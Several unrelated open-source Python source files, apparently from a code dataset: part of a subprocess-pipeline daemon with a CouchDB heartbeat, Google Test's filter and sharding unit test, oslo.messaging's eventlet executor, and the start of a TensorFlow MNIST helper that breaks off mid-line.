        db_handler = couchDB.CouchDBServer()
        while True:
            try:
                MyUtils.beat(db_handler, self.SERVICE_NAME)
                time.sleep(10)
            except ValueError:
                # Service not found:
                # - maybe it doesn't exist at all, register it
                # - it may have been deleted while the daemon was running, re-register it
                register_service(db_handler, self.SERVICE_NAME)
            except requests.ConnectionError:
                # Error connecting to the Couchdb database, ignore as it may be temporary
                pass

    def launch_heartbeat(self):
        """Starts the heartbeat thread if HEARTBEAT_ENABLED == "true"."""
        # Launch the heartbeat thread
        if "HEARTBEAT_ENABLED" in self.environment and self.environment["HEARTBEAT_ENABLED"] == "true":
            # Launch heartbeat thread
            heartbeat = Thread(target=self.beat, args=())
            heartbeat.daemon = True
            heartbeat.start()

    def initialize_environment(self, config_path, config_keys, default_environment_values):
        """Builds self.environment from the config file plus defaults."""
        self.environment = self.create_environment(read_config(config_path, config_keys), config_keys,
                                                   default_environment_values)

    @staticmethod
    def threaded_read_last_process_output(process):
        # Forward the last pipeline stage's stdout line-by-line to our stdout.
        for line in process.stdout:
            print(line.strip())  # Dump to stdout of daemon
            sys.stdout.flush()

    @staticmethod
    def create_environment(config_dict, config_keys, default_environment_values):
        """Returns a copy of os.environ overlaid with config values.

        Keys present in the config file win; otherwise the default is used.
        """
        custom_environment = os.environ.copy()
        # FROM CONFIG FILE #
        for key in config_keys:
            if key in config_dict.keys():
                custom_environment[key] = config_dict[key]
            else:
                custom_environment[key] = default_environment_values[key]
        return custom_environment

    @staticmethod
    def good_finish():
        # Exit code 0: clean shutdown.
        sys.exit(0)

    @staticmethod
    def bad_finish():
        # Exit code 1: pipeline gave up.
        sys.exit(1)

    @staticmethod
    def create_pipe(cmd, environment, pipe_input, pipe_output):
        """Spawns one pipeline stage with the given stdin/stdout wiring."""
        return subprocess.Popen(cmd,
                                env=environment,
                                stdin=pipe_input,
                                stdout=pipe_output
                                )

    # Terminate all the programs that create the pipeline
    def destroy_pipeline(self):
        self.logger.info("Destroying pipeline")
        for process in self.processes_list:
            try:
                # terminate() then wait() so we reap the child and can log its
                # final exit status.
                process.terminate()
                process.wait()
                self.logger.info(
                    "Process " + str(process.pid) + " terminated with exit status " + str(process.returncode))
            except OSError:
                # Process may have already exited
                pass

    def poll_for_exited_processes(self):
        """Returns True if any pipeline stage has terminated."""
        for process in self.processes_list:
            process.poll()  # refreshes returncode without blocking
            if process.returncode is not None:
                return True
        return False

    def check_if_runnable(self):
        # Subclass-provided predicate; only warns, does not abort.
        if not self.is_runnable(self.environment):
            eprint(self.not_runnable_message)

    def loop(self):
        """Supervision loop: restart the pipeline on failure, up to MAX_TRIES.

        Exits via bad_finish() after too many failures, or good_finish() on
        SystemExit/KeyboardInterrupt.
        """
        try:
            while True:
                exited_processes = self.poll_for_exited_processes()
                if exited_processes:
                    self.logger.info("Error in pipeline")
                    self.destroy_pipeline()
                    if self.pipeline_tries < self.MAX_TRIES:
                        self.pipeline_tries += 1
                        self.logger.info("The pipeline was destroyed, re-creating and launching a new one")
                        self.launch_pipeline()
                    else:
                        self.logger.info(
                            "Pipeline failed too many times, (" + str(self.MAX_TRIES) + "), stopping daemon")
                        self.bad_finish()
                time.sleep(5)
        except(SystemExit, KeyboardInterrupt):
            self.logger.info("Exception or signal caught, stopping daemon and destroying the pipeline.")
            self.destroy_pipeline()
            self.good_finish()

    @abc.abstractmethod
    def create_pipeline(self):
        """Method documentation"""
        return []


def command_is_runnable(command_as_list):
    """Returns True if the command runs successfully (exit status 0)."""
    try:
        subprocess.check_call(command_as_list, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    except Exception as e:
        eprint(str(e) + " " + str(traceback.format_exc()))
        return False
    return True


def read_config(config_path, config_keys):
    """Reads the requested keys from the [DEFAULT] section of an ini file.

    Missing keys are simply omitted from the returned dict.
    """
    config_dict = {}
    config = configparser.ConfigParser()
    config.read(os.path.join(_base_path, config_path))
    for key in config_keys:
        try:
            config_dict[key] = config['DEFAULT'][key]
        except KeyError:
            pass  # Key is not configure, take the default value
    return config_dict


def check_path_existance_and_create(path):
    """mkdir -p: create the directory, ignoring 'already exists'."""
    try:
        os.makedirs(path)
    except OSError as exception:
        if exception.errno != errno.EEXIST:
            raise


def register_service(db_handler, service_name):
    """Registers this service document in the state database."""
    import MyUtils.MyUtils as MyUtils
    service = dict(
        name=service_name,
        heartbeat="",
        heartbeat_human="",
        type="service"
    )
    MyUtils.register_service(db_handler, service)


def configure_daemon_logs(service_name):
    """Sets up a file logger under logs/<service>.log; also ensures pids/ exists.

    Returns (handler, logger).
    """
    logger = logging.getLogger(service_name)
    logger.setLevel(logging.INFO)
    formatter = logging.Formatter("%(asctime)s - %(name)s - %(message)s")
    log_path = os.path.join(_base_path, "logs/")
    check_path_existance_and_create(log_path)
    pids_path = os.path.join(_base_path, "pids/")
    check_path_existance_and_create(pids_path)
    handler = logging.FileHandler(os.path.join(log_path, service_name + ".log"))
    handler.setFormatter(formatter)
    logger.addHandler(handler)
    return handler, logger
gpl-3.0
toanalien/phantomjs
src/qt/qtwebkit/Source/ThirdParty/gtest/test/gtest_filter_unittest.py
2826
21261
#!/usr/bin/env python # # Copyright 2005 Google Inc. All Rights Reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are # met: # # * Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # * Redistributions in binary form must reproduce the above # copyright notice, this list of conditions and the following disclaimer # in the documentation and/or other materials provided with the # distribution. # * Neither the name of Google Inc. nor the names of its # contributors may be used to endorse or promote products derived from # this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR # A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT # OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, # SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT # LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, # DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY # THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. """Unit test for Google Test test filters. A user can specify which test(s) in a Google Test program to run via either the GTEST_FILTER environment variable or the --gtest_filter flag. This script tests such functionality by invoking gtest_filter_unittest_ (a program written with Google Test) with different environments and command line flags. Note that test sharding may also influence which tests are filtered. Therefore, we test that here also. 
""" __author__ = 'wan@google.com (Zhanyong Wan)' import os import re import sets import sys import gtest_test_utils # Constants. # Checks if this platform can pass empty environment variables to child # processes. We set an env variable to an empty string and invoke a python # script in a subprocess to print whether the variable is STILL in # os.environ. We then use 'eval' to parse the child's output so that an # exception is thrown if the input is anything other than 'True' nor 'False'. os.environ['EMPTY_VAR'] = '' child = gtest_test_utils.Subprocess( [sys.executable, '-c', 'import os; print \'EMPTY_VAR\' in os.environ']) CAN_PASS_EMPTY_ENV = eval(child.output) # Check if this platform can unset environment variables in child processes. # We set an env variable to a non-empty string, unset it, and invoke # a python script in a subprocess to print whether the variable # is NO LONGER in os.environ. # We use 'eval' to parse the child's output so that an exception # is thrown if the input is neither 'True' nor 'False'. os.environ['UNSET_VAR'] = 'X' del os.environ['UNSET_VAR'] child = gtest_test_utils.Subprocess( [sys.executable, '-c', 'import os; print \'UNSET_VAR\' not in os.environ']) CAN_UNSET_ENV = eval(child.output) # Checks if we should test with an empty filter. This doesn't # make sense on platforms that cannot pass empty env variables (Win32) # and on platforms that cannot unset variables (since we cannot tell # the difference between "" and NULL -- Borland and Solaris < 5.10) CAN_TEST_EMPTY_FILTER = (CAN_PASS_EMPTY_ENV and CAN_UNSET_ENV) # The environment variable for specifying the test filters. FILTER_ENV_VAR = 'GTEST_FILTER' # The environment variables for test sharding. TOTAL_SHARDS_ENV_VAR = 'GTEST_TOTAL_SHARDS' SHARD_INDEX_ENV_VAR = 'GTEST_SHARD_INDEX' SHARD_STATUS_FILE_ENV_VAR = 'GTEST_SHARD_STATUS_FILE' # The command line flag for specifying the test filters. FILTER_FLAG = 'gtest_filter' # The command line flag for including disabled tests. 
ALSO_RUN_DISABED_TESTS_FLAG = 'gtest_also_run_disabled_tests' # Command to run the gtest_filter_unittest_ program. COMMAND = gtest_test_utils.GetTestExecutablePath('gtest_filter_unittest_') # Regex for determining whether parameterized tests are enabled in the binary. PARAM_TEST_REGEX = re.compile(r'/ParamTest') # Regex for parsing test case names from Google Test's output. TEST_CASE_REGEX = re.compile(r'^\[\-+\] \d+ tests? from (\w+(/\w+)?)') # Regex for parsing test names from Google Test's output. TEST_REGEX = re.compile(r'^\[\s*RUN\s*\].*\.(\w+(/\w+)?)') # The command line flag to tell Google Test to output the list of tests it # will run. LIST_TESTS_FLAG = '--gtest_list_tests' # Indicates whether Google Test supports death tests. SUPPORTS_DEATH_TESTS = 'HasDeathTest' in gtest_test_utils.Subprocess( [COMMAND, LIST_TESTS_FLAG]).output # Full names of all tests in gtest_filter_unittests_. PARAM_TESTS = [ 'SeqP/ParamTest.TestX/0', 'SeqP/ParamTest.TestX/1', 'SeqP/ParamTest.TestY/0', 'SeqP/ParamTest.TestY/1', 'SeqQ/ParamTest.TestX/0', 'SeqQ/ParamTest.TestX/1', 'SeqQ/ParamTest.TestY/0', 'SeqQ/ParamTest.TestY/1', ] DISABLED_TESTS = [ 'BarTest.DISABLED_TestFour', 'BarTest.DISABLED_TestFive', 'BazTest.DISABLED_TestC', 'DISABLED_FoobarTest.Test1', 'DISABLED_FoobarTest.DISABLED_Test2', 'DISABLED_FoobarbazTest.TestA', ] if SUPPORTS_DEATH_TESTS: DEATH_TESTS = [ 'HasDeathTest.Test1', 'HasDeathTest.Test2', ] else: DEATH_TESTS = [] # All the non-disabled tests. ACTIVE_TESTS = [ 'FooTest.Abc', 'FooTest.Xyz', 'BarTest.TestOne', 'BarTest.TestTwo', 'BarTest.TestThree', 'BazTest.TestOne', 'BazTest.TestA', 'BazTest.TestB', ] + DEATH_TESTS + PARAM_TESTS param_tests_present = None # Utilities. 
environ = os.environ.copy() def SetEnvVar(env_var, value): """Sets the env variable to 'value'; unsets it when 'value' is None.""" if value is not None: environ[env_var] = value elif env_var in environ: del environ[env_var] def RunAndReturnOutput(args = None): """Runs the test program and returns its output.""" return gtest_test_utils.Subprocess([COMMAND] + (args or []), env=environ).output def RunAndExtractTestList(args = None): """Runs the test program and returns its exit code and a list of tests run.""" p = gtest_test_utils.Subprocess([COMMAND] + (args or []), env=environ) tests_run = [] test_case = '' test = '' for line in p.output.split('\n'): match = TEST_CASE_REGEX.match(line) if match is not None: test_case = match.group(1) else: match = TEST_REGEX.match(line) if match is not None: test = match.group(1) tests_run.append(test_case + '.' + test) return (tests_run, p.exit_code) def InvokeWithModifiedEnv(extra_env, function, *args, **kwargs): """Runs the given function and arguments in a modified environment.""" try: original_env = environ.copy() environ.update(extra_env) return function(*args, **kwargs) finally: environ.clear() environ.update(original_env) def RunWithSharding(total_shards, shard_index, command): """Runs a test program shard and returns exit code and a list of tests run.""" extra_env = {SHARD_INDEX_ENV_VAR: str(shard_index), TOTAL_SHARDS_ENV_VAR: str(total_shards)} return InvokeWithModifiedEnv(extra_env, RunAndExtractTestList, command) # The unit test. class GTestFilterUnitTest(gtest_test_utils.TestCase): """Tests the env variable or the command line flag to filter tests.""" # Utilities. 
  def AssertSetEqual(self, lhs, rhs):
    """Asserts that two sets are equal."""

    # Mutual-containment check; assert_ is the (deprecated) alias of
    # assertTrue in the Python 2 era unittest this file targets.
    for elem in lhs:
      self.assert_(elem in rhs, '%s in %s' % (elem, rhs))

    for elem in rhs:
      self.assert_(elem in lhs, '%s in %s' % (elem, lhs))

  def AssertPartitionIsValid(self, set_var, list_of_sets):
    """Asserts that list_of_sets is a valid partition of set_var."""

    full_partition = []
    for slice_var in list_of_sets:
      full_partition.extend(slice_var)
    # Same length and same membership => no duplicates across slices and
    # nothing missing, i.e. a proper partition.
    self.assertEqual(len(set_var), len(full_partition))
    self.assertEqual(sets.Set(set_var), sets.Set(full_partition))

  def AdjustForParameterizedTests(self, tests_to_run):
    """Adjust tests_to_run in case value parameterized tests are disabled."""

    global param_tests_present
    if not param_tests_present:
      # Binary was built without value-parameterized tests: drop them from
      # the expectation.
      return list(sets.Set(tests_to_run) - sets.Set(PARAM_TESTS))
    else:
      return tests_to_run

  def RunAndVerify(self, gtest_filter, tests_to_run):
    """Checks that the binary runs correct set of tests for a given filter."""

    tests_to_run = self.AdjustForParameterizedTests(tests_to_run)

    # First, tests using the environment variable.

    # Windows removes empty variables from the environment when passing it
    # to a new process.  This means it is impossible to pass an empty filter
    # into a process using the environment variable.  However, we can still
    # test the case when the variable is not supplied (i.e., gtest_filter is
    # None).
    # pylint: disable-msg=C6403
    if CAN_TEST_EMPTY_FILTER or gtest_filter != '':
      SetEnvVar(FILTER_ENV_VAR, gtest_filter)
      tests_run = RunAndExtractTestList()[0]
      SetEnvVar(FILTER_ENV_VAR, None)
      self.AssertSetEqual(tests_run, tests_to_run)
    # pylint: enable-msg=C6403

    # Next, tests using the command line flag.

    if gtest_filter is None:
      args = []
    else:
      args = ['--%s=%s' % (FILTER_FLAG, gtest_filter)]

    tests_run = RunAndExtractTestList(args)[0]
    self.AssertSetEqual(tests_run, tests_to_run)

  def RunAndVerifyWithSharding(self, gtest_filter, total_shards, tests_to_run,
                               args=None, check_exit_0=False):
    """Checks that binary runs correct tests for the given filter and shard.

    Runs all shards of gtest_filter_unittest_ with the given filter, and
    verifies that the right set of tests were run. The union of tests run
    on each shard should be identical to tests_to_run, without duplicates.

    Args:
      gtest_filter: A filter to apply to the tests.
      total_shards: A total number of shards to split test run into.
      tests_to_run: A set of tests expected to run.
      args :        Arguments to pass to the to the test binary.
      check_exit_0: When set to a true value, make sure that all shards
                    return 0.
    """
    tests_to_run = self.AdjustForParameterizedTests(tests_to_run)

    # Windows removes empty variables from the environment when passing it
    # to a new process.  This means it is impossible to pass an empty filter
    # into a process using the environment variable.  However, we can still
    # test the case when the variable is not supplied (i.e., gtest_filter is
    # None).
    # pylint: disable-msg=C6403
    if CAN_TEST_EMPTY_FILTER or gtest_filter != '':
      SetEnvVar(FILTER_ENV_VAR, gtest_filter)
      partition = []
      for i in range(0, total_shards):
        (tests_run, exit_code) = RunWithSharding(total_shards, i, args)
        if check_exit_0:
          self.assertEqual(0, exit_code)
        partition.append(tests_run)

      self.AssertPartitionIsValid(tests_to_run, partition)
      SetEnvVar(FILTER_ENV_VAR, None)
    # pylint: enable-msg=C6403

  def RunAndVerifyAllowingDisabled(self, gtest_filter, tests_to_run):
    """Checks that the binary runs correct set of tests for the given filter.

    Runs gtest_filter_unittest_ with the given filter, and enables
    disabled tests. Verifies that the right set of tests were run.

    Args:
      gtest_filter: A filter to apply to the tests.
      tests_to_run: A set of tests expected to run.
    """
    tests_to_run = self.AdjustForParameterizedTests(tests_to_run)

    # Construct the command line.
    args = ['--%s' % ALSO_RUN_DISABED_TESTS_FLAG]
    if gtest_filter is not None:
      args.append('--%s=%s' % (FILTER_FLAG, gtest_filter))

    tests_run = RunAndExtractTestList(args)[0]
    self.AssertSetEqual(tests_run, tests_to_run)

  def setUp(self):
    """Sets up test case.

    Determines whether value-parameterized tests are enabled in the binary and
    sets the flags accordingly.
    """
    # Probe the binary only once per process; cached in the module global.
    global param_tests_present
    if param_tests_present is None:
      param_tests_present = PARAM_TEST_REGEX.search(
          RunAndReturnOutput()) is not None

  def testDefaultBehavior(self):
    """Tests the behavior of not specifying the filter."""

    self.RunAndVerify(None, ACTIVE_TESTS)

  def testDefaultBehaviorWithShards(self):
    """Tests the behavior without the filter, with sharding enabled."""

    # Shard counts below, at, and above the number of tests, to exercise
    # empty shards.
    self.RunAndVerifyWithSharding(None, 1, ACTIVE_TESTS)
    self.RunAndVerifyWithSharding(None, 2, ACTIVE_TESTS)
    self.RunAndVerifyWithSharding(None, len(ACTIVE_TESTS) - 1, ACTIVE_TESTS)
    self.RunAndVerifyWithSharding(None, len(ACTIVE_TESTS), ACTIVE_TESTS)
    self.RunAndVerifyWithSharding(None, len(ACTIVE_TESTS) + 1, ACTIVE_TESTS)

  def testEmptyFilter(self):
    """Tests an empty filter."""

    self.RunAndVerify('', [])
    self.RunAndVerifyWithSharding('', 1, [])
    self.RunAndVerifyWithSharding('', 2, [])

  def testBadFilter(self):
    """Tests a filter that matches nothing."""

    self.RunAndVerify('BadFilter', [])
    self.RunAndVerifyAllowingDisabled('BadFilter', [])

  def testFullName(self):
    """Tests filtering by full name."""

    self.RunAndVerify('FooTest.Xyz', ['FooTest.Xyz'])
    self.RunAndVerifyAllowingDisabled('FooTest.Xyz', ['FooTest.Xyz'])
    self.RunAndVerifyWithSharding('FooTest.Xyz', 5, ['FooTest.Xyz'])

  def testUniversalFilters(self):
    """Tests filters that match everything."""

    self.RunAndVerify('*', ACTIVE_TESTS)
    self.RunAndVerify('*.*', ACTIVE_TESTS)
    self.RunAndVerifyWithSharding('*.*', len(ACTIVE_TESTS) - 3, ACTIVE_TESTS)
    self.RunAndVerifyAllowingDisabled('*', ACTIVE_TESTS + DISABLED_TESTS)
    self.RunAndVerifyAllowingDisabled('*.*', ACTIVE_TESTS + DISABLED_TESTS)

  def testFilterByTestCase(self):
    """Tests filtering by test case name."""

    self.RunAndVerify('FooTest.*', ['FooTest.Abc', 'FooTest.Xyz'])

    BAZ_TESTS = ['BazTest.TestOne', 'BazTest.TestA', 'BazTest.TestB']
    self.RunAndVerify('BazTest.*', BAZ_TESTS)
    self.RunAndVerifyAllowingDisabled('BazTest.*',
                                      BAZ_TESTS + ['BazTest.DISABLED_TestC'])

  def testFilterByTest(self):
    """Tests filtering by test name."""

    self.RunAndVerify('*.TestOne', ['BarTest.TestOne', 'BazTest.TestOne'])

  def testFilterDisabledTests(self):
    """Select only the disabled tests to run."""

    self.RunAndVerify('DISABLED_FoobarTest.Test1', [])
    self.RunAndVerifyAllowingDisabled('DISABLED_FoobarTest.Test1',
                                      ['DISABLED_FoobarTest.Test1'])

    self.RunAndVerify('*DISABLED_*', [])
    self.RunAndVerifyAllowingDisabled('*DISABLED_*', DISABLED_TESTS)

    self.RunAndVerify('*.DISABLED_*', [])
    self.RunAndVerifyAllowingDisabled('*.DISABLED_*', [
        'BarTest.DISABLED_TestFour',
        'BarTest.DISABLED_TestFive',
        'BazTest.DISABLED_TestC',
        'DISABLED_FoobarTest.DISABLED_Test2',
        ])

    self.RunAndVerify('DISABLED_*', [])
    self.RunAndVerifyAllowingDisabled('DISABLED_*', [
        'DISABLED_FoobarTest.Test1',
        'DISABLED_FoobarTest.DISABLED_Test2',
        'DISABLED_FoobarbazTest.TestA',
        ])

  def testWildcardInTestCaseName(self):
    """Tests using wildcard in the test case name."""

    self.RunAndVerify('*a*.*', [
        'BarTest.TestOne',
        'BarTest.TestTwo',
        'BarTest.TestThree',

        'BazTest.TestOne',
        'BazTest.TestA',
        'BazTest.TestB', ] + DEATH_TESTS + PARAM_TESTS)

  def testWildcardInTestName(self):
    """Tests using wildcard in the test name."""

    self.RunAndVerify('*.*A*', ['FooTest.Abc', 'BazTest.TestA'])

  def testFilterWithoutDot(self):
    """Tests a filter that has no '.' in it."""

    self.RunAndVerify('*z*', [
        'FooTest.Xyz',

        'BazTest.TestOne',
        'BazTest.TestA',
        'BazTest.TestB',
        ])

  def testTwoPatterns(self):
    """Tests filters that consist of two patterns."""

    self.RunAndVerify('Foo*.*:*A*', [
        'FooTest.Abc',
        'FooTest.Xyz',

        'BazTest.TestA',
        ])

    # An empty pattern + a non-empty one
    self.RunAndVerify(':*A*', ['FooTest.Abc', 'BazTest.TestA'])

  def testThreePatterns(self):
    """Tests filters that consist of three patterns."""

    self.RunAndVerify('*oo*:*A*:*One', [
        'FooTest.Abc',
        'FooTest.Xyz',

        'BarTest.TestOne',

        'BazTest.TestOne',
        'BazTest.TestA',
        ])

    # The 2nd pattern is empty.
    self.RunAndVerify('*oo*::*One', [
        'FooTest.Abc',
        'FooTest.Xyz',

        'BarTest.TestOne',

        'BazTest.TestOne',
        ])

    # The last 2 patterns are empty.
    self.RunAndVerify('*oo*::', [
        'FooTest.Abc',
        'FooTest.Xyz',
        ])

  def testNegativeFilters(self):
    # Everything after '-' is a negative (exclusion) pattern list.
    self.RunAndVerify('*-BazTest.TestOne', [
        'FooTest.Abc',
        'FooTest.Xyz',

        'BarTest.TestOne',
        'BarTest.TestTwo',
        'BarTest.TestThree',

        'BazTest.TestA',
        'BazTest.TestB',
        ] + DEATH_TESTS + PARAM_TESTS)

    self.RunAndVerify('*-FooTest.Abc:BazTest.*', [
        'FooTest.Xyz',

        'BarTest.TestOne',
        'BarTest.TestTwo',
        'BarTest.TestThree',
        ] + DEATH_TESTS + PARAM_TESTS)

    self.RunAndVerify('BarTest.*-BarTest.TestOne', [
        'BarTest.TestTwo',
        'BarTest.TestThree',
        ])

    # Tests without leading '*'.
    self.RunAndVerify('-FooTest.Abc:FooTest.Xyz:BazTest.*', [
        'BarTest.TestOne',
        'BarTest.TestTwo',
        'BarTest.TestThree',
        ] + DEATH_TESTS + PARAM_TESTS)

    # Value parameterized tests.
    self.RunAndVerify('*/*', PARAM_TESTS)

    # Value parameterized tests filtering by the sequence name.
    self.RunAndVerify('SeqP/*', [
        'SeqP/ParamTest.TestX/0',
        'SeqP/ParamTest.TestX/1',
        'SeqP/ParamTest.TestY/0',
        'SeqP/ParamTest.TestY/1',
        ])

    # Value parameterized tests filtering by the test name.
    self.RunAndVerify('*/0', [
        'SeqP/ParamTest.TestX/0',
        'SeqP/ParamTest.TestY/0',
        'SeqQ/ParamTest.TestX/0',
        'SeqQ/ParamTest.TestY/0',
        ])

  def testFlagOverridesEnvVar(self):
    """Tests that the filter flag overrides the filtering env. variable."""

    SetEnvVar(FILTER_ENV_VAR, 'Foo*')
    args = ['--%s=%s' % (FILTER_FLAG, '*One')]
    tests_run = RunAndExtractTestList(args)[0]
    SetEnvVar(FILTER_ENV_VAR, None)

    # The flag's '*One' filter wins over the env var's 'Foo*'.
    self.AssertSetEqual(tests_run, ['BarTest.TestOne', 'BazTest.TestOne'])

  def testShardStatusFileIsCreated(self):
    """Tests that the shard file is created if specified in the environment."""

    shard_status_file = os.path.join(gtest_test_utils.GetTempDir(),
                                     'shard_status_file')
    self.assert_(not os.path.exists(shard_status_file))

    extra_env = {SHARD_STATUS_FILE_ENV_VAR: shard_status_file}
    try:
      InvokeWithModifiedEnv(extra_env, RunAndReturnOutput)
    finally:
      self.assert_(os.path.exists(shard_status_file))
      os.remove(shard_status_file)

  def testShardStatusFileIsCreatedWithListTests(self):
    """Tests that the shard file is created with the "list_tests" flag."""

    shard_status_file = os.path.join(gtest_test_utils.GetTempDir(),
                                     'shard_status_file2')
    self.assert_(not os.path.exists(shard_status_file))

    extra_env = {SHARD_STATUS_FILE_ENV_VAR: shard_status_file}
    try:
      output = InvokeWithModifiedEnv(extra_env,
                                     RunAndReturnOutput,
                                     [LIST_TESTS_FLAG])
    finally:
      # This assertion ensures that Google Test enumerated the tests as
      # opposed to running them.
      self.assert_('[==========]' not in output,
                   'Unexpected output during test enumeration.\n'
                   'Please ensure that LIST_TESTS_FLAG is assigned the\n'
                   'correct flag value for listing Google Test tests.')

      self.assert_(os.path.exists(shard_status_file))
      os.remove(shard_status_file)

  # Death tests interact with sharding only when the binary supports them.
  if SUPPORTS_DEATH_TESTS:
    def testShardingWorksWithDeathTests(self):
      """Tests integration with death tests and sharding."""

      gtest_filter = 'HasDeathTest.*:SeqP/*'
      expected_tests = [
          'HasDeathTest.Test1',
          'HasDeathTest.Test2',

          'SeqP/ParamTest.TestX/0',
          'SeqP/ParamTest.TestX/1',
          'SeqP/ParamTest.TestY/0',
          'SeqP/ParamTest.TestY/1',
          ]

      # Verify both death test styles behave the same under sharding.
      for flag in ['--gtest_death_test_style=threadsafe',
                   '--gtest_death_test_style=fast']:
        self.RunAndVerifyWithSharding(gtest_filter, 3, expected_tests,
                                      check_exit_0=True, args=[flag])
        self.RunAndVerifyWithSharding(gtest_filter, 5, expected_tests,
                                      check_exit_0=True, args=[flag])

if __name__ == '__main__':
  gtest_test_utils.Main()
bsd-3-clause
akash1808/oslo.messaging
oslo_messaging/_executors/impl_eventlet.py
2
3805
# Copyright 2013 Red Hat, Inc.
# Copyright 2013 New Dream Network, LLC (DreamHost)
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
#      http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.

import logging
import sys

import eventlet
from eventlet.green import threading as greenthreading
from eventlet import greenpool
import greenlet
from oslo_utils import excutils

from oslo_messaging._executors import base
from oslo_messaging import localcontext

LOG = logging.getLogger(__name__)


def spawn_with(ctxt, pool):
    """Run a context manager's body in a greenthread from the pool.

    This is the equivalent of a with statement but with the content of the
    BLOCK statement executed into a greenthread.  The callable returned by
    ctxt.__enter__() becomes the greenthread's body; ctxt.__exit__() is
    invoked when the greenthread finishes, with exc_info on failure.

    exception path grab from:
    http://www.python.org/dev/peps/pep-0343/
    """
    def complete(thread, exit):
        # Mirrors the PEP 343 expansion: exc tracks whether __exit__ still
        # needs to be called on the success path.
        exc = True
        try:
            try:
                thread.wait()
            except Exception:
                exc = False
                # __exit__ returning a falsy value means "do not suppress";
                # re-raise inside the bare except so the traceback survives.
                if not exit(*sys.exc_info()):
                    raise
        finally:
            if exc:
                # Normal completion: __exit__ with no exception info.
                exit(None, None, None)

    callback = ctxt.__enter__()
    thread = pool.spawn(callback)
    # link() fires complete() once the greenthread ends, passing __exit__.
    thread.link(complete, ctxt.__exit__)

    return thread


class EventletExecutor(base.PooledExecutorBase):
    """A message executor which integrates with eventlet.

    This is an executor which polls for incoming messages from a greenthread
    and dispatches each message in its own greenthread.

    The stop() method kills the message polling greenthread and the wait()
    method waits for all message dispatch greenthreads to complete.
    """

    def __init__(self, conf, listener, dispatcher):
        super(EventletExecutor, self).__init__(conf, listener, dispatcher)
        # Greenthread running the poll loop; None when not started.
        self._thread = None
        # Pool bounding the number of concurrent dispatch greenthreads.
        self._greenpool = greenpool.GreenPool(self.conf.rpc_thread_pool_size)
        self._running = False

        # Warn (don't fail, yet) when threading was not monkeypatched before
        # oslo.messaging was imported: localcontext would then use a plain
        # thread-local, which greenthreads would share unpredictably.
        # NOTE(review): the log message's grammar is off ("will results"),
        # but it is a runtime string and is left untouched here.
        if not isinstance(localcontext._STORE, greenthreading.local):
            LOG.debug('eventlet executor in use but the threading module '
                      'has not been monkeypatched or has been '
                      'monkeypatched after the oslo.messaging library '
                      'have been loaded. This will results in unpredictable '
                      'behavior. In the future, we will raise a '
                      'RuntimeException in this case.')

    def _dispatch(self, incoming):
        # dispatcher(incoming) yields a context manager whose body handles
        # the message; run it in its own greenthread from the pool.
        spawn_with(ctxt=self.dispatcher(incoming), pool=self._greenpool)

    def start(self):
        """Start the polling greenthread (idempotent)."""
        if self._thread is not None:
            return

        @excutils.forever_retry_uncaught_exceptions
        def _executor_thread():
            try:
                while self._running:
                    incoming = self.listener.poll()
                    if incoming is not None:
                        self._dispatch(incoming)
            except greenlet.GreenletExit:
                # Raised by _thread.cancel() in stop(); exit quietly.
                return

        self._running = True
        self._thread = eventlet.spawn(_executor_thread)

    def stop(self):
        """Ask the polling loop to exit; does not wait for dispatches."""
        if self._thread is None:
            return
        self._running = False
        self.listener.stop()
        # cancel() raises GreenletExit in the poll loop if it is blocked.
        self._thread.cancel()

    def wait(self):
        """Block until in-flight dispatches and the poll loop finish."""
        if self._thread is None:
            return
        # Drain dispatch greenthreads first, then join the poller.
        self._greenpool.waitall()
        try:
            self._thread.wait()
        except greenlet.GreenletExit:
            pass
        self._thread = None
apache-2.0
adit-chandra/tensorflow
tensorflow/examples/saved_model/integration_tests/mnist_util.py
5
1945
# Copyright 2019 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Convenience wrapper around Keras' MNIST and Fashion MNIST data.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import numpy as np import tensorflow.compat.v2 as tf INPUT_SHAPE = (28, 28, 1) NUM_CLASSES = 10 def _load_random_data(num_train_and_test): return ((np.random.randint(0, 256, (num, 28, 28), dtype=np.uint8), np.random.randint(0, 10, (num,), dtype=np.int64)) for num in num_train_and_test) def load_reshaped_data(use_fashion_mnist=False, fake_tiny_data=False): """Returns MNIST or Fashion MNIST or fake train and test data.""" load = ((lambda: _load_random_data([16, 128])) if fake_tiny_data else tf.keras.datasets.fashion_mnist.load_data if use_fashion_mnist else tf.keras.datasets.mnist.load_data) (x_train, y_train), (x_test, y_test) = load() return ((_prepare_image(x_train), _prepare_label(y_train)), (_prepare_image(x_test), 